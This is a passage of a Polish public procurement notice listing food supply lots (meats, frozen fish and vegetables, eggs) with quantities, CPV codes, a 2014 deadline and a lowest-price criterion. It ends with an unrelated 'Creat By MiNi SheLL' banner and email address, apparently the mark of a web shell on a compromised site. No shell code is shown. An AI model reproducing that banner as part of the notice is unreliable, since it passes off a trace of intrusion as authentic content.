63	Kaszanka	- 500	kg
64	Pieczeń	- 500	kg
65	Pasztet typu firmowy	- 200	kg
66	Pasztet zapiekany	- 100	kg
67	Pasztetowa drobiowa	- 80	kg
68	Pasztetowa firmowa	- 80	kg
69	Pieczeń tyrolska	- 80	kg
70	Słonina świeża bez skóry	- 150	kg
71	Smalec	- 520	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby, mrożonki i przetwory warzywno owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Filet z pangi mrożony do 10% glazury	- 100	kg
2	Filet z morszczuka mrożony SHP, bez glazury 	- 300	kg
3	Filet z soli mrożony do 15% glazury 	- 80	kg
4	Filet z dorsza mrożony SHP, bez glazury	- 150	kg
5	Filet z tilapii mrożony do 25% glazury	- 145	kg
6	Miruna mrożona - filet SHP, bez glazury	- 300	kg
7	Śledź a-la Matjas	- 300	kg
8	Pyzy z mięsem (typu Nordis)	- 800	kg
9	Pyzy ziemniaczane (typu Nordis)	- 800	kg
10	Mrożonka wiosenna 7 skład. (typu Nordis)	- 700	kg
11	Mrożonka włoszczyzna polska (typu Nordis) - 700	kg
12	Mrożonka bukiet warzyw (typu Nordis)	- 250	kg
13	Mrożonka kompotowa (typu Nordis)	- 1 000	kg
14	Kalafior mrożony (typu Nordis)	- 100	kg
15	Zupa kalafiorowa (typu Nordis)	- 80	kg
16	Zupa senatorska (typu Nordis)	- 250	kg
17	Truskawka mrożona (typu Nordis)	- 300	kg
18	Fasola mrożona (typu Nordis)	- 150	kg
19	Lody różne (cena jednostkowa do 1 zł)	- 2 000	szt.
20	Malina mrożona (typu Nordis)	- 90	kg
21	Brukselka mrożona (typu Nordis)	- 53	kg
22	Pierogi z serem (typu Nordis)	- 400	kg
23	Pierogi ruskie (typu Nordis)	- 320	kg
24	Tłuszcz FRYTURA	- 100	kg
25	Sałatka typu staropolska	- 150	kg
26	Sałatka typu greckiego	- 150	kg
27	Sałatka typu szwedzka	- 150	kg
28	Jabłka prażone szarlotka	- 500	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Jaja kurze 	- 40 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com